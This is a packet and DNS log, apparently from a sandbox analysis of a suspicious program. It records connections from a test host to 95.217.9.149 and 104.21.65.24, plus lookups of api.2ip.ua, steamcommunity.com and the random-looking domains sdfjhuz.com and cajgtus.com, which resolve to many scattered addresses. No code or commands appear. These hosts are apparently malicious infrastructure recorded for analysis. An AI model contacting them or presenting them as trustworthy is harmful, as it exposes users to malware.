                                                                                                                                      Apr 24, 2024 14:42:30.303112984 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.308480024 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.308521032 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.308567047 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.308582067 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.308612108 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.308626890 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.314330101 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.314414024 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.314414024 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.314435959 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.314470053 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.314493895 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.318114996 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.318156958 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.318198919 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.318207026 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.318242073 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.318259954 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.321245909 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.321290970 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.321327925 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.321337938 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.321366072 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.321393967 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.324093103 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.324160099 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.324177027 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.324234962 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.327426910 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.327466965 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.327500105 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.327507019 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.327534914 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.327557087 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.331118107 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.331162930 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.331192970 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.331198931 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.331248045 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.331248045 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.334446907 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.334490061 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.334527016 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.334533930 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.334574938 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.337311983 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.337356091 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.337404966 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.337412119 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.337446928 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.337466002 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.340930939 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.340974092 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.341012955 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.341022015 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.341049910 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.341068029 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.344458103 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.344510078 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.344558001 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.344558001 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.344568014 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.344613075 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.347260952 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.347306967 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.347342014 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.347348928 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.347382069 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.347393990 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.350966930 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.351010084 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.351036072 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.351042986 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.351077080 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.351094961 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.354500055 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.354543924 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.354604959 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.354612112 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.354648113 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.354669094 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.357554913 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.357599974 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.357618093 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.357624054 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.357656956 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.357671022 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.360696077 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.360739946 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.360770941 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.360778093 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.360814095 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.360829115 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.363439083 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.363482952 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.363568068 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.363569021 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.363578081 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.366312027 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.366990089 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.367034912 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.367125988 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.367125988 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.367132902 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.367254972 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.369822979 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.369884968 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.369918108 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.369930983 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.369963884 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.369996071 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.370001078 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.370024920 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.370070934 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.370078087 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.370125055 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.370176077 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.370383978 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.370662928 CEST49720443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.370676041 CEST4434972095.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.541136026 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.541188955 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.541266918 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.541527987 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:30.541541100 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.998428106 CEST44349721104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.998826981 CEST44349721104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:30.998898983 CEST49721443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:30.999108076 CEST49721443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:42:30.999124050 CEST44349721104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:31.194894075 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:31.197412968 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:31.197849035 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:31.197859049 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:31.199506998 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:31.199513912 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:31.199529886 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:31.199537039 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:31.717086077 CEST49723443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:31.717125893 CEST4434972395.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:31.717206955 CEST49723443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:31.717423916 CEST49723443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:31.717442036 CEST4434972395.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:32.361457109 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:32.361530066 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:32.361603975 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:32.362384081 CEST49722443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:32.362411022 CEST4434972295.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:32.370927095 CEST4434972395.217.9.149192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:32.370997906 CEST49723443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:42:33.771258116 CEST49723443192.168.2.795.217.9.149
                                                                                                                                      Apr 24, 2024 14:43:13.573401928 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:13.573462963 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:13.573777914 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:13.595406055 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:13.595431089 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:13.924680948 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:13.924766064 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:13.933490992 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:13.933511019 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:13.933743954 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:13.933794975 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:13.948772907 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:13.992122889 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:14.701792002 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:14.702063084 CEST44349727104.21.65.24192.168.2.7
                                                                                                                                      Apr 24, 2024 14:43:14.702181101 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:14.702383041 CEST49727443192.168.2.7104.21.65.24
                                                                                                                                      Apr 24, 2024 14:43:14.702404022 CEST44349727104.21.65.24192.168.2.7

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Apr 24, 2024 14:42:02.766165972 CEST6536853192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:02.944678068 CEST53653681.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:06.665133953 CEST6141453192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:06.667478085 CEST5378753192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:07.687155962 CEST5378753192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:07.687155962 CEST6141453192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:08.680334091 CEST6141453192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:08.680366993 CEST5378753192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:10.680545092 CEST5378753192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:10.680622101 CEST6141453192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST53614141.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST53614141.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST53614141.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST53537871.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST53537871.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.797008991 CEST53537871.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.833969116 CEST53614141.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:10.834151030 CEST53537871.1.1.1192.168.2.7
                                                                                                                                      Apr 24, 2024 14:42:14.182370901 CEST5407853192.168.2.71.1.1.1
                                                                                                                                      Apr 24, 2024 14:42:14.344806910 CEST53540781.1.1.1192.168.2.7

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Apr 24, 2024 14:42:02.766165972 CEST192.168.2.71.1.1.10x1cccStandard query (0)api.2ip.uaA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:06.665133953 CEST192.168.2.71.1.1.10xaa8cStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:06.667478085 CEST192.168.2.71.1.1.10xaf79Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:07.687155962 CEST192.168.2.71.1.1.10xaf79Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:07.687155962 CEST192.168.2.71.1.1.10xaa8cStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:08.680334091 CEST192.168.2.71.1.1.10xaa8cStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:08.680366993 CEST192.168.2.71.1.1.10xaf79Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680545092 CEST192.168.2.71.1.1.10xaf79Standard query (0)cajgtus.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680622101 CEST192.168.2.71.1.1.10xaa8cStandard query (0)sdfjhuz.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:14.182370901 CEST192.168.2.71.1.1.10x4c80Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Apr 24, 2024 14:42:02.944678068 CEST1.1.1.1192.168.2.70x1cccNo error (0)api.2ip.ua104.21.65.24A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:02.944678068 CEST1.1.1.1192.168.2.70x1cccNo error (0)api.2ip.ua172.67.139.220A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com63.143.98.185A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680737019 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com63.143.98.185A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680752993 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com211.181.24.132A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com63.143.98.185A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.28.78.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com181.47.131.246A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com116.58.10.60A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.98.23.157A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.680766106 CEST1.1.1.1192.168.2.70xaa8cNo error (0)sdfjhuz.com190.145.136.42A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com189.232.19.193A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com152.231.127.122A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.13.174.91A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com119.204.11.2A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com181.91.106.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796935081 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com189.232.19.193A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com152.231.127.122A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com102.189.122.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com186.182.55.44A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com46.100.50.5A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.13.174.91A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com119.204.11.2A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com181.91.106.114A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 14:42:10.796994925 CEST1.1.1.1192.168.2.70xaf79No error (0)cajgtus.com190.12.87.61A (IP address)IN (0x0001)false
